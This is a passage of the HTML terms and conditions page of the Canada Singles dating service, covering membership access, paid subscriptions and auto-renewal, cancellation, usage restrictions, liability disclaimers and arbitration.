from its Services in our sole discretion for any reason, including, but not limited to, any non-compliance with applicable laws or regulations or these Terms & Conditions.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »7. CONDITIONS OF ACCESS » tab_id= »1596408075079-b13f29f3-75fc »][vc_column_text]</p> <p style="text-align: left;">7.1         You shall select a username and a password when signing up to our Services.</p> <p style="text-align: left;">7.2         When you sign up, you will become a Member of the particular brand of the Services for which you have registered.  Although the Company in its discretion may make your profile visible to the Users of one or more of its other Services if you meet requirements, you will not be a Member without specific registration.</p> <p style="text-align: left;">7.3         Your username and the password shall be personal and confidential. Each Member shall keep them confidential and undertakes not to notify or disclose them to third parties or other Members to prevent fraud or phising.</p> <p style="text-align: left;">7.4         All Users undertake not to use another Member’s username or password, or any other personal information of another User.</p> <p style="text-align: left;">7.5         Any breach of these provisions may lead to the cancellation of a Member’s Membership, without prejudice to the liability incurred by the relevant Member due to the use of the username and/or password by another Member or third party.</p> <p style="text-align: left;">7.6         Each Member shall take care not to disclose strictly personal information.</p> <p style="text-align: left;">7.7         We will take any necessary measures to halt fraudulent behaviour, including to prevent the prohibited sharing of usernames or passwords.</p> <p style="text-align: left;">7.8         We reserve the option of removing:</p> <p style="text-align: left;">7.8.1         information published or present on the Websites for more than 6 months;</p> <p style="text-align: left;">7.8.2         the account of a Member which has not been used for more than 6 months after the end of a subscription or has never been used after admission to Membership, after verification that no subscription is in progress.</p> <p style="text-align: left;">7.9         Each User undertakes not to carry out any action likely to hinder the operation of the Services and undertakes not to disseminate or arrange for the dissemination of viruses, spam, logic bombs, software applications, etc.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »8. PAID FEATURES » tab_id= »1596408101096-99064676-faef »][vc_column_text]</p> <p style="text-align: left;">8.1         You may purchase a paid Membership for one or more of the products offered by the Company.</p> <p style="text-align: left;">8.2         Your paid Membership will only give you access to the particular Company product for which you have registered.  Although the Company in its discretion may make your profile visible to the Users of one or more of its other Services if you meet requirements, you will not be a Member of those other Services without registering for it specifically.</p> <p style="text-align: left;">8.3         The price and payment procedures are permanently accessible on the Websites.</p> <p style="text-align: left;">8.4         All prices stated include all relevant local taxes.</p> <p style="text-align: left;">8.5         We reserve the right to change the cost of any of our Services.  If you are not happy with the cost of any Services, you may cancel your Membership in accordance with these Terms & Conditions.</p> <p style="text-align: left;">8.6         To the extent permitted by applicable laws and regulations, no refunds will be offered (except in exceptional circumstances such as major service failures).  There will be no refund of any payment made by you for a paid Membership if you haven’t cancelled your contract according to these Terms & Conditions.</p> <p style="text-align: left;">8.7         If you do not pay any amount due pursuant to these Terms & Conditions:</p> <p style="text-align: left;">8.7.1         We reserve the right to suspend your access until such time as the outstanding payment is received or to terminate the contract without prior notice. The contract period shall remain unaffected by the temporary closure.</p> <p style="text-align: left;">8.7.2         We may, in accordance with applicable law, forward any debt in arrears for a reasonable period to an external collection agency for recovery. Debt recovery fees will be charged by the external collection agency on the overdue account balance.</p> <p style="text-align: left;">8.7.3         In accordance with applicable law, you may be charged 10% of the overdue account balance as an expense for debt recovery.</p> <p style="text-align: left;">8.7.4         You are entitled to prove that the account balance is not in fact outstanding, or that the account balance is lower than alleged.</p> <p style="text-align: left;">8.7.5         This clause shall not affect the assertion of damages caused by the overdue account balance.</p> <p style="text-align: left;">8.8         We may, from time to time, offer paid features (such as subscriptions, micropayments, etc.) through other service providers, such as the Apple app store or the Android market (each, an “<strong>App Store</strong>”).</p> <p style="text-align: left;">8.9         Such paid features may be subject to other payment conditions and other conditions than those in these Terms & Conditions.  The relevant App Store may require you to agree with its own terms & conditions.  Any such applicable terms will be brought to your attention prior to purchase. You agree to comply with, and your license to use our Services is conditional upon your compliance with, all relevant terms and conditions of the applicable App Store.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »9. AUTOMATIC RENEWAL » tab_id= »1596408118455-b821da32-e02e »][vc_column_text]</p> <p style="text-align: left;">9.1         <strong>We automatically renew all paid Memberships before the expiry of the term of the paid Membership (where permitted by applicable law). When you first subscribe for your paid Membership, you acknowledge that when your paid Membership expires it will automatically renew for the duration and at the cost indicated to you at your initial purchase. Where required by applicable law, the renewal date will be specified in a renewal notice provided to you.  IF YOU DO NOT WANT YOUR PAID MEMBERSHIP TO AUTOMATICALLY RENEW, YOU MUST CANCEL YOUR PAID MEMBERSHIP IN ACCORDANCE WITH THE PROCESS SET OUT BELOW IN THESE TERMS & CONDITIONS.</strong></p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »10. CANCELLATION AND WITHDRAWAL » tab_id= »1596408163704-9f269962-3144″][vc_column_text]</p> <p style="text-align: left;">10.1      There are three ways of cancelling your Membership:</p> <p style="text-align: left;">10.1.1      Cancellation of free Membership – you may cancel at any time (see <strong>Section </strong><strong>11</strong>);</p> <p style="text-align: left;">10.1.2      Cancellation of your paid Membership during the 3 day cooling-off period (see <strong>Section </strong><strong>12</strong>);</p> <p style="text-align: left;">10.1.3      Cancellation of the automatic renewal of your paid Membership after the cooling-off period has expired – you may cancel automatic renewal at any time and enjoy our Services until the end of the paid term (see <strong>Section </strong><strong>13</strong>).</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »11. CANCELLATION OF FREE MEMBERSHIP » tab_id= »1596408200191-71d3c285-7817″][vc_column_text]</p> <p style="text-align: left;">11.1      You may cancel your free Membership at any time.</p> <p style="text-align: left;">11.2      You may cancel by logging into your account on the Websites and following the links, or by writing to<span style="color: #ff0000;"> <a style="color: #ff0000;" href="/customer-care/">Customer Care</a></span> or by <strong>email to </strong><a href="mailto:cancellation@canada-singles.ca" target="_blank" rel="noopener noreferrer">cancellation@canada-singles.ca</a><strong> or by post to</strong></p> <p style="text-align: left;">Canada Singles Customer Care –<br /> <strong>Global Fusion Media</strong><br /> subsidiary Company<br /> <strong>Ads Go</strong><br /> CP 21523 BP Ste-Famille, Sherbrooke QC J1G 5K2<br /> Canada<br /> Email: support@canada-singles.ca</p> <p>[/vc_column_text][vc_column_text]</p> <p style="text-align: left;">11.1      You may cancel your free Membership at any time.</p> <p style="text-align: left;">11.2      You may cancel by logging into your account on the Websites and following the links, or by writing to<span style="color: #ff0000;"> <a style="color: #ff0000;" href="/customer-care/">Customer Care</a></span> or by <strong>email to </strong><a href="mailto:cancellation@canada-singles.ca" target="_blank" rel="noopener noreferrer">cancellation@canada-singles.ca</a><strong> or by post to</strong></p> <p style="text-align: left;">Canada Singles Customer Care –<br /> <strong>Global fusion Media</strong><br /> CP 21523 csp Ste-Famille, Sherbrooke QC J1G 5K2<br /> Canada<br /> Email: <a href="mailto:dataprotection@canada-singles.ca">dataprotection@canada-singles.ca</a></p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »12. CANCELLATION OF YOUR PAID MEMBERSHIP DURING THE 3 DAY COOLING-OFF PERIOD » tab_id= »1596408222705-7bfdd049-6e5a »][vc_column_text]</p> <p style="text-align: left;">12.1      As a paying Member, you may withdraw from your paid Membership at any time <strong>within the first three days</strong> of making your initial payment provided that you have not started using the Services (for example, by sending messages to other Members).</p> <p style="text-align: left;">12.2      You may withdraw by logging into your account on the Websites and following the links, or by writing to Customer Care at <a href="https://canada-singles.ca/service-clientele/">https://canada-singles.ca/service-clientele/</a> or by <strong>email to </strong><a href="mailto:withdrawal@canada-singles.ca" target="_blank" rel="noopener noreferrer">withdrawal@canada-singles.ca</a><strong> or by post to</strong></p> <p style="text-align: left;"><strong>Global Fusion Media</strong><br /> subsidiary Company<br /> <strong>Ads Go</strong><br /> CP 21523 BP Ste-Famille, Sherbrooke QC J1G 5K2<br /> Canada<br /> Email: <a href="mailto:dataprotection@canada-singles.ca">dataprotection@canada-singles.ca</a></p> <p style="text-align: left;">12.3      If you cancel your Membership within the first 3 days of your paid Membership and you have made any payment in advance for the Services, we will refund these amounts to you (again, provided that you have not started using the Services).</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »13. CANCELLATION OF AUTOMATIC RENEWAL » tab_id= »1596408242142-4ff60dc0-52df »][vc_column_text]13.1      If you are a paying Member and you did not cancel your paid Membership in accordance with section 12, you may apply for cancellation at the latest 24 hours before the date of renewal of the subscription.  If you cancel your paid membership less than 24 hours before the expiry of the term of your paid Membership, <strong>YOUR PAID MEMBERSHIP WILL BE AUTOMATICALLY RENEWED IN ACCORDANCE WITH THESE TERMS & CONDITIONS (WHERE ALLOWED BY APPLICABLE LAW)</strong>.</p> <p>13.2      <strong>THE CANCELLATION OF YOUR PAID MEMBERSHIP WILL BE EFFECTIVE UPON THE EXPIRY OF THE RELEVANT PAID PERIOD</strong> AND YOU WILL HAVE FULL USE OF OUR SERVICES UNTIL THAT TIME. <strong>NO REFUND IS APPLICABLE</strong> UNLESS APPLICABLE LAW OR THESE TERMS & CONDITIONS OTHERWISE PROVIDE.</p> <p>13.3      Following cancellation of your paid Membership, you will retain a free Membership with a more limited scope of Services.</p> <p>13.4      You may cancel your automatic renewal by logging into your account on the Websites and following the links, or by writing to <a href="/customer-care/">Customer Care</a> or by <strong>email to </strong><a href="mailto:cancellation@canada-singles.ca" target="_blank" rel="noopener noreferrer">cancellation@canada-singles.ca</a><strong> or by post to</strong></p> <p><strong>Global Fusion Media</strong><br /> subsidiary Company<br /> <strong>Ads Go</strong><br /> CP 21523 BP Ste-Famille, Sherbrooke QC J1G 5K2<br /> Canada<br /> Email: <a href="mailto:dataprotection@canada-singles.ca">dataprotection@canada-singles.ca</a>[/vc_column_text][/vc_tta_section][vc_tta_section title= »14. CANCELLATION OF YOUR MEMBERSHIP BY THE COMPANY » tab_id= »1596408267182-70ff7ad7-5572″][vc_column_text]</p> <p style="text-align: left;">14.1      If we cancel a Member’s Membership for that Member’s breach of these Terms & Conditions, the Member shall not be entitled to a refund for the period remaining to elapse until the expiry of the account, without prejudice to any damages sought by us as compensation for the loss suffered.</p> <p style="text-align: left;">14.2      If we cancel a Member’s Membership in its sole discretion for reasons other than that Member’s breach of these Terms & Conditions, the Member shall be entitled to a refund for the period remaining to elapse until the expiry of the account.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »15. TECHNOLOGY REQUIREMENTS » tab_id= »1596408282446-732a3522-c770″][vc_column_text]</p> <p style="text-align: left;">15.1      The technology you use to access our Services may be required to meet minimum specifications provided by us.</p> <p style="text-align: left;">15.2      We may require that you download and install updates to the Apps from time to time. You acknowledge and agree that we may update the Apps with or without notifying you and add or remove features or functions to the Apps (and/or the Apps, the Websites and/or the Services) at any time in our sole discretion.</p> <p style="text-align: left;">15.3      You acknowledge and agree that we have no obligation to:</p> <p style="text-align: left;">15.3.1      make any subsequent versions of the Apps available to you;</p> <p style="text-align: left;">15.3.2      make the Apps, the Websites and/or the Services available to you at all;</p> <p style="text-align: left;">15.3.3      continue to support the Apps, the Websites and/or the Services in any way. You acknowledge that your access to the Apps, the Websites and/or the Services may not be continuous, features may change during your use, and we may terminate your access or stop offering any or all of the Apps, the Websites and/or the Services at any time.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »16. TERMS & CONDITIONS – UPDATES AND AMENDMENTS » tab_id= »1596408307838-4000f679-1807″][vc_column_text]</p> <p style="text-align: left;">16.1      The Company may update and amend these Terms & Conditions at any time and the Company will make the updated Terms & Conditions available through the Services. You understand and agree that you will be deemed to have accepted the updated Terms & Conditions if you use the Services after the updated Terms & Conditions are made available to you. If at any point you do not agree to any part of the Terms & Conditions in operation, you should immediately stop using the Services.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »17. PROVISION OF THE SERVICE » tab_id= »1596408328230-d3351375-15fd »][vc_column_text]</p> <p style="text-align: left;">17.1      You acknowledge and agree that the Company may make changes to, or stop providing, the Apps, the Websites and/or the Services, or restrict your use of the Apps, the Websites and/or the Services, at any time without notifying you in advance.</p> <p style="text-align: left;">17.2      You are solely responsible for all data, SMS, mobile carrier, Internet and telecommunications fees and charges incurred in connection with your use of the Apps, the Websites and/or the Services.</p> <p style="text-align: left;">17.3      You acknowledge and agree that the Company can disable or deny you access to the Apps, the Websites and/or the Services, without notifying you in advance, for any reason or no reason including, without limitation, for any violation of these Terms & Conditions and/or if the Company suspects that you have used any aspect of the Services to conduct any fraudulent or illegal activity. If the Company disables your access to your account, you may be prevented from accessing the Services, your account details or any materials contained in your account.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »18. LICENSE, RESTRICTIONS AND CONDITIONS OF USE » tab_id= »1596408350016-74efa433-5770″][vc_column_text]</p> <p style="text-align: left;">18.1      Subject to the terms and conditions of this Agreement and for the sole purpose of using the Services, the Company hereby grants you a limited, non-exclusive, revocable, non-sublicensable, non-transferable license to:</p> <p style="text-align: left;">18.1.1      install any or all of the Mobile Apps on one or more mobile devices which are owned by you, are under your control and which meet the Company’s minimum specifications;</p> <p style="text-align: left;">18.1.2      install any or all of the Desktop Apps on one or more computers which are owned by you, are under your control and which meet the Company’s minimum specifications; and</p> <p style="text-align: left;">18.1.3      view, review and utilize the Apps and any related information provided to you by the Company.</p> <p style="text-align: left;">18.2      You agree not to access, or attempt to access, the Services by any means other than through the Websites or the Apps. You specifically agree not to access, or attempt to access, the Services through any automated means (including, without limitation, through the use of scripts, bots, unauthorized third party apps, spiders or web crawlers).</p> <p style="text-align: left;">18.3      You agree that you will not, in connection with your use of the Apps, the Websites and/or the Services, violate any applicable law, ordinance, rule, regulation or treaty.</p> <p style="text-align: left;">18.4      You shall not connect to or use the Apps, the Websites and/or the Services in any way that is not expressly permitted by these Terms & Conditions.</p> <p style="text-align: left;">18.5      You may not:</p> <p style="text-align: left;">18.5.1      remove any proprietary notices from the Services or any copy of software provided to you by the Company (“<strong>Software</strong>”);</p> <p style="text-align: left;">18.5.2      cause, permit or authorize the modification, creation of derivative works, translation, reverse engineering, decompiling, disassembling or hacking of the Apps, the Services or any Software;</p> <p style="text-align: left;">18.5.3      sell, assign, rent, lease, act as a service bureau, or grant rights in the Apps, the Services or any Software, including, without limitation, through sublicense, to any other person or entity without the prior written consent of the Company; or</p> <p style="text-align: left;">18.5.4      make any false, misleading or deceptive statement or representation regarding the Company and/or the Apps, the Websites or the Services.</p> <p style="text-align: left;">18.6      Without limiting the foregoing, YOU AGREE THAT YOU WILL NOT:</p> <p style="text-align: left;">18.6.1      engage in any activity that:</p> <p style="text-align: left;">(a)              promotes discrimination, bigotry, racism, hatred, harassment or harm against any individual or group;</p> <p style="text-align: left;">(b)             is defamatory, obscene, pornographic, vulgar or offensive;</p> <p style="text-align: left;">(c)              is violent or threatening or promotes violence or actions that are threatening to any other person;</p> <p style="text-align: left;">(d)             infringes, misappropriates or violates a third party’s patent, copyright, trademark, trade secret, moral rights or other intellectual property rights, or rights of publicity or privacy;</p> <p style="text-align: left;">(e)              violates, or encourages any conduct that would violate, any applicable law or regulation or would give rise to civil liability;</p> <p style="text-align: left;">(f)              is fraudulent, false, misleading (directly or by omission or failure to update information) or deceptive;</p> <p style="text-align: left;">(g)              constitutes phishing, pharming or impersonates any other person or entity, or steals or assumes any person’s identity (whether a real identity or online nickname or alias); or</p> <p style="text-align: left;">(h)             is otherwise contrary to applicable laws and regulations;</p> <p style="text-align: left;">18.6.2      disseminate any personal information of any other User, including any contact details or similar, without that User’s consent;</p> <p style="text-align: left;">18.6.3      institute, assist, or become involved in any type of attack, including, without limitation, denial of service attacks, upon the Apps, the Websites and/or the Services (or any servers, systems or networks connected to the Apps, the Websites and/or the Services);</p> <p style="text-align: left;">18.6.4      attempt to obstruct, disrupt or interfere with the operation of the Apps, the Websites and/or the Services or any other person’s or entity’s use of the Apps, the Websites and/or the Services (or any servers, systems or networks connected to the Apps, the Websites and/or the Services);</p> <p style="text-align: left;">18.6.5      attempt to gain unauthorized access to the Apps, the Websites, the Services, accounts registered to other Users, or any servers, systems or networks connected to the Apps, the Websites and/or the Services;</p> <p style="text-align: left;">18.6.6      use the Apps, the Websites and/or the Services to</p> <p style="text-align: left;">(a)              develop, generate, transmit or store information that is unlawful or illegal, defamatory, harmful, abusive, hateful, racially or ethnically offensive that encourages conduct that would be considered a criminal offence; or</p> <p style="text-align: left;">(b)             perform any unsolicited commercial communication not permitted by applicable law.</p> <p style="text-align: left;">18.7      Each User undertakes to report any abuses to the Company, as well as any improper comments or conduct by other Users.</p> <p style="text-align: left;">18.8      We conduct regular of the use of our Services from time to time, including for safety and fraud protection purposes.  We reserve the right to remove all or part of any content created, used or circulated publically or privately by Users which is not compliant with applicable laws or regulations, or which violates these Terms & Conditions.</p> <p style="text-align: left;">18.9      We may contact any User to request that you remedy any non-compliance with applicable laws or regulations, or these Terms & Conditions.</p> <p style="text-align: left;">18.10   The Company may at its option, terminate its relationship with you, or may disable your account immediately if it determines you are using the Services contrary to the restrictions found in this Section 18 or any other terms of these Terms & Conditions.</p> <p style="text-align: left;">18.11   We may exclude any User from, or terminate any User’s access to, our Services in our sole discretion for any reason, including, but not limited to, any non-compliance with applicable laws or regulations or these Terms & Conditions.  You acknowledge and agree that you are solely responsible, and the Company has no responsibility or liability to you or any other person or entity, for any breach by you of these Terms & Conditions or for the consequences of any such breach.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »19. LINKS TO OTHER WEBSITES » tab_id= »1596408375910-82da1b54-5b7e »][vc_column_text]</p> <p style="text-align: left;">19.1      Our Services may contain links to other websites and to resources provided by third parties (“<strong>Other Sites</strong>”). The Other Sites are linked to provide information only and are solely for your convenience.</p> <p style="text-align: left;">19.2      The Company has no control over, does not accept and assumes no responsibility for the content or products or services of Other Sites and does not accept any responsibility for any loss or damage that may arise from your use of them.</p> <p style="text-align: left;">19.3      If you choose to access Other Sites, you do so at your own risk and on the terms and conditions and in accordance with the privacy policy (if applicable) of the Other Sites.</p> <p style="text-align: left;">19.4      Our Services may also feature advertising by third parties. By allowing third parties to advertise on our Services, the Company does not make any representations or warranties in respect of or endorse the products or services advertised.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »20. INTELLECTUAL PROPERTY » tab_id= »1596408393541-000ae934-3d70″][vc_column_text]</p> <p style="text-align: left;">20.1      All intellectual property rights (including the various rights conferred by statute, common law and equity in and in relation to copyright, patents, trademarks, service marks, trade names and/or designs (including the “look and feel” and other visual or non-literal elements) (whether registered or unregistered) in:</p> <p style="text-align: left;">20.1.1      our Services;</p> <p style="text-align: left;">20.1.2      Subject to clause 20.3, information content on our Services; and</p> <p style="text-align: left;">20.1.3      All the design, text and graphics, software, photos, videos, music, sounds, and their selection and arrangement, and all software compilations, underlying source code and software (including applets and scripts) of our Services,</p> <p style="text-align: left;">are owned by or licensed to the Company. You shall not, and shall not attempt to, obtain any title to any such intellectual property rights. All rights are reserved.</p> <p style="text-align: left;">20.2      None of the material listed in clause 20.1 may be reproduced or redistributed or copied, distributed, republished, downloaded, displayed, posted or transmitted in any form or by any means, sold, rented or sub-licensed, used to create derivative works, or in any way exploited without the prior express written permission of the Company. You may, however, retrieve and display the content of our Services on a computer screen (including any tablet or smartphone device), store such content in electronic form on disk (but not on any server or other storage device connected to a network) or print one copy of such content for your own personal, non-commercial use, provided you keep intact all and any copyright and proprietary notices. You may not otherwise reproduce, modify, copy or distribute or use for commercial purposes any of the materials or content on our Services without the express prior written permission of the Company.</p> <p style="text-align: left;">20.3      Title, ownership rights and intellectual property rights in and to content accessed using our Services is the property of the applicable content owner or supplier and may be protected by applicable copyright, trademark or other law. Subject to the limited rights described in clause 20.2, this Agreement gives you no rights to such content.</p> <p style="text-align: left;">20.4      The authors of the literary and artistic works in the pages in our Services have asserted their moral rights to be identified as the author of those works.</p> <p style="text-align: left;">20.5      Any material you transmit, post or submit to the Company either through our Services or otherwise (<strong>Material</strong>) shall be considered (and the Company may treat it as) non-confidential (subject to the Company’s obligations under privacy legislation). You grant the Company a royalty-free, perpetual, irrevocable, non-exclusive licence to use, copy, modify, adapt, translate, publish and distribute world-wide any Material (other than Ideas).</p> <p style="text-align: left;">20.6      All comments, suggestions, ideas, notes, drawings or concepts in which intellectual property rights subsist which are disclosed or offered to the Company by you or offered in response to solicitations by the Company regarding our Services (<strong>Ideas</strong>) shall be deemed to be and shall remain the property the Company and you hereby assign all existing present and future intellectual property rights in Ideas, to the Company. You must do all things reasonably requested by the Company to assure further the assignment of such rights. You understand and acknowledge that the Company has both internal resources and other external resources which may have developed or may in the future develop ideas identical to or similar to Ideas and that the Company is only willing to consider Ideas on these terms. In any event, Ideas are not submitted in confidence and the Company assumes no obligation, express or implied by considering it. Without limitation, the Company will exclusively own all now known or hereafter existing rights to the Ideas of every kind and nature throughout the world and shall be entitled to unrestricted use of the Ideas for any purpose whatsoever, commercial or otherwise without compensation to the provider of the Ideas.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »21. DISCLAIMER OF WARRANTIES » tab_id= »1596408416814-e5165796-0516″][vc_column_text]</p> <p style="text-align: left;">21.1      You understand and agree that your use of the Apps, the Websites and/or the Services is at your sole risk.</p> <p style="text-align: left;">21.2       The Apps, the Websites and the Services are provided on an “as is” and “as available” basis without warranties or conditions of any kind, either express or implied (to the maximum extent permitted by applicable law).</p> <p style="text-align: left;">21.3      To the maximum extent permitted by applicable law, the Company expressly disclaims all warranties and conditions including, without limitation, warranties and conditions of satisfactory quality, merchantability, fitness for a particular purpose, non-infringement, and those arising from course of dealing or usage of trade.</p> <p style="text-align: left;">21.4      The Company makes no warranty as to the accuracy, completeness or reliability of any materials, information or data available through, or the performance of, the Apps, the Websites and/or the Services.</p> <p style="text-align: left;">21.5      The Company does not represent or warrant that:</p> <p style="text-align: left;">21.5.1      you will be able to access or use the Apps, the Websites and/or the Services at the times or locations of your choosing;</p> <p style="text-align: left;">21.5.2      that operation of the Apps, the Websites and/or the Services will be uninterrupted, timely, error-free;</p> <p style="text-align: left;">21.5.3      your use of the Apps, the Websites and/or the Services will meet your requirements;</p> <p style="text-align: left;">21.5.4      defects in the operation of the Apps, the Websites and/or the Services will be corrected; or</p> <p style="text-align: left;">21.5.5      the Apps, the Websites and/or the Services is free of viruses or other harmful components.</p> <p style="text-align: left;">21.6      You acknowledge and agree that any material downloaded or otherwise obtained through the use of the Apps, the Websites and/or the Services is at your own risk and that you will be solely responsible for any damage to your computer, mobile phone or other device or any loss of data resulting from downloading or obtaining such material.</p> <p style="text-align: left;">21.7      Some jurisdictions do not allow the disclaimer of implied warranties.  In such jurisdictions, the Company expressly disclaims all warranties and conditions to the maximum extent permitted by applicable law.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »22. LIMITATION OF LIABILITY » tab_id= »1596408443043-8880cd5c-23db »][vc_column_text]</p> <p style="text-align: left;">22.1      <strong>TO THE MAXIMUM EXTENT PERMITTED BY APPLICABLE LAW, IN NO EVENT WILL </strong>, <strong>THE COMPANY, ITS SUBSIDIARIES OR HOLDING COMPANY, ANY SUBSIDIARY OF ANY SUCH HOLDING COMPANY, AFFILIATES, SUCCESSORS, ASSIGNS, AND THEIR RESPECTIVE EMPLOYEES, AGENTS, DIRECTORS, OFFICERS AND SHAREHOLDERS, WHETHER INDIVIDUALLY OR COLLECTIVELY (THE “RELATED PARTIES”), BE LIABLE TO YOU OR TO ANY OTHER PERSON FOR ANY INCIDENTAL, CONSEQUENTIAL, OR INDIRECT DAMAGES (INCLUDING, BUT NOT LIMITED TO, DAMAGES FOR LOSS OF DATA, LOSS OF PROGRAMS, COST OF PROCUREMENT OF SUBSTITUTE SERVICES OR SERVICE INTERRUPTIONS) ARISING OUT OF THE USE OF OR INABILITY TO USE THE SERVICES, EVEN IF WE OR OUR AGENTS OR REPRESENTATIVES KNOW OR HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.</strong></p> <p style="text-align: left;">22.2      <strong>WE DO NOT CONDUCT BACKGROUND CHECKS ON MEMBERS REGISTERING FOR THE SERVICES IN ANY WAY. ANY ATTEMPT BY US TO SCREEN MEMBERS IS NOT A GUARANTEE OF SAFETY ON THE WEBSITE. YOU ARE RESPONSIBLE FOR YOUR OWN SAFETY ON THE WEBSITE AND WHEN MEETING OTHER MEMBERS IN PERSON.</strong></p> <p style="text-align: left;">22.3      <strong>THE RELATED PARTIES WILL NOT BE LIABLE FOR ANY DAMAGES, DIRECT, INDIRECT, INCIDENTAL AND/OR CONSEQUENTIAL ARISING OUT OF THE USE OF THE SERVICES, INCLUDING, WITHOUT LIMITATION, DAMAGES ARISING OUT OF YOUR COMMUNICATIONS WITH AND/OR INTERACTIONS WITH ANY OTHER MEMBER OF THE SERVICES, OR ANY INDIVIDUAL YOU MEET VIA THE SERVICES.</strong></p> <p style="text-align: left;">22.4      <strong>NOTWITHSTANDING ANYTHING TO THE CONTRARY CONTAINED HEREIN, OR TO THE EXTENT APPLICABLE LAW DOES NOT PERMIT THE LIMITATIONS IN THIS CLAUSE, THE RELATED PARTIES’ LIABILITY TO YOU FOR ANY CAUSE WHATSOEVER WILL AT ALL TIMES BE LIMITED TO THE AMOUNT PAID, IF ANY, BY YOU TO US FOR THE SERVICES DURING THE TERM OF YOUR MEMBERSHIP OR SUBSCRIPTION TO THE MAXIMUM EXTENT PERMITTED BY LAW.</strong></p> <p style="text-align: left;">22.5      <strong>IN ALL CASES, THE RELATED PARTIES WILL NOT BE LIABLE TO YOU FOR ANY LOSS OR DAMAGE THAT IS NOT REASONABLY FORESEEABLE.</strong></p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »23. INDEMNIFICATION » tab_id= »1596408462486-d9c1b7f0-10b1″][vc_column_text]</p> <p style="text-align: left;">23.1      You agree to, and you hereby, defend, indemnify, and hold the Related Parties harmless from and against any and all claims, damages, losses, costs, investigations, liabilities, judgments, fines, penalties, settlements, interest, and expenses (including attorneys’ fees) that directly or indirectly arise from or are related to any claim, suit, action, demand, or proceeding made or brought against any Related Party, or on account of the investigation, defense, or settlement thereof, arising out of or in connection with, whether occurring heretofore or hereafter:</p> <p style="text-align: left;">23.1.1      any of your data posted or otherwise provided on the Services;</p> <p style="text-align: left;">23.1.2      your Material;</p> <p style="text-align: left;">23.1.3      your use of the Services and your activities in connection with the Services, including your communications and meetings with Members you meet through the Services;</p> <p style="text-align: left;">23.1.4      your breach or alleged breach of this Agreement or any additional terms;</p> <p style="text-align: left;">23.1.5      your violation or alleged violation of any laws, rules, regulations, codes, statutes, ordinances, or orders of any governmental or quasi-governmental authorities in connection with your use of the Services or your activities in connection with the Services;</p> <p style="text-align: left;">23.1.6      information or material transmitted through your computer or other devices, even if not submitted by you, that infringes, violates, or misappropriates any copyright, trademark, trade secret, trade dress, patent, publicity, privacy, or other right of any person or entity;</p> <p style="text-align: left;">23.1.7      any misrepresentation made by you; and</p> <p style="text-align: left;">23.1.8      the Related Parties’ use of the information that you submit to us (including your Material)</p> <p style="text-align: left;">(all of the foregoing, “<strong>Claims and Losses</strong>”).</p> <p style="text-align: left;">You will cooperate as fully required by Related Parties in the defense of any Claims and Losses. Notwithstanding the foregoing, Related Parties retain the exclusive right to settle, compromise, and pay any and all Claims and Losses. Related Parties reserve the right to assume the exclusive defense and control of any Claims and Losses. You will not settle any Claims and Losses without, in each instance, the prior written consent of an officer of a Related Party.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »24. GOVERNING LAW; JURISDICTION » tab_id= »1596408483902-eeb6aafd-fe7a »][vc_column_text]</p> <p style="text-align: left;">24.1      The laws applicable to the interpretation of these Terms & Conditions shall be the laws of the Province of Ontario and the federal laws applicable therein, excluding the UN Convention on Contracts for the International Sale of Goods (CISG) and excluding principles of conflict of laws.  Except as provided in Section 25 below, you irrevocably submit to the personal and exclusive jurisdiction of the state and federal courts located in Ontario for all disputes arising out of or related to your use of any of the Services.</p> <p style="text-align: left;">24.2      The governing law does not impact your rights as a consumer according to the consumer protection laws and regulations of your country of residence.</p> <p style="text-align: left;">24.3      You acknowledge and agree that the Company would be irreparably damaged if the terms of these Terms & Conditions were not specifically enforced, and therefore you agree that we shall be entitled, without bond, other security, or proof of damages, to appropriate equitable remedies with respect to breaches of these Terms & Conditions, in addition to such other remedies as we may otherwise have available to us under applicable laws.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »25. DISPUTE RESOLUTION; ARBITRATION –WITHIN THE UNITED STATES AND CANADA » tab_id= »1596408503327-6dd42d3a-5825″][vc_column_text]</p> <p style="text-align: left;"><strong><ins cite="mailto:James%20Apps" datetime="2017-12-04T11:38">IF YOU RESIDE IN THE UNITED STATES OR CANADA (OR YOU BRING A CLAIM AGAINST THE COMPANY IN THE UNITED STATES OR CANADA), YOU ARE SUBJECT TO THE FOLLOWING SECTION.  PLEASE READ THIS SECTION CAREFULLY.</ins></strong></p> <p style="text-align: left;">25.1         This provision shall apply to the resolution of any dispute arising out of or in any way related to the Services, this Agreement (and any amendments or addenda thereto), and the subject matter hereof, including without limitation any contract, tort, statutory or equity claims between you and us or our officers, directors, employees, agents, subsidiaries, or joint ventures (the “<strong>Dispute</strong>”); provided, however, that any claims specifically described in subparagraph (b) below will not be included in the definition of Dispute. You may also assert claims in small claims court if your claims qualify. In the event of any Dispute, the parties are encouraged to attempt to resolve the Dispute by informal means. If the parties are not able to do so, the Dispute will be resolved only by binding arbitration.</p> <p style="text-align: left;">25.2         Arbitration is the referral of a dispute to one or more impartial persons for a final and binding determination. Any Dispute shall be subject only to binding arbitration. The parties expressly agree that there shall be no jury trial or right to a jury trial, or right to any other proceeding to resolve any Dispute in any court. In the event of any Dispute, both parties agree that the arbitration provision in this Agreement will be governed, both procedurally and substantively, by the Federal Arbitration Act, 9 U.S.C. sections 1-9 (“<strong>FAA</strong>”) to the maximum extent permitted by applicable law.</p> <p style="text-align: left;">25.3         All aspects of the arbitration proceeding, and any ruling, decision or award by the arbitrator, will be strictly confidential for the benefit of all parties, and any party shall have the right to prevent any 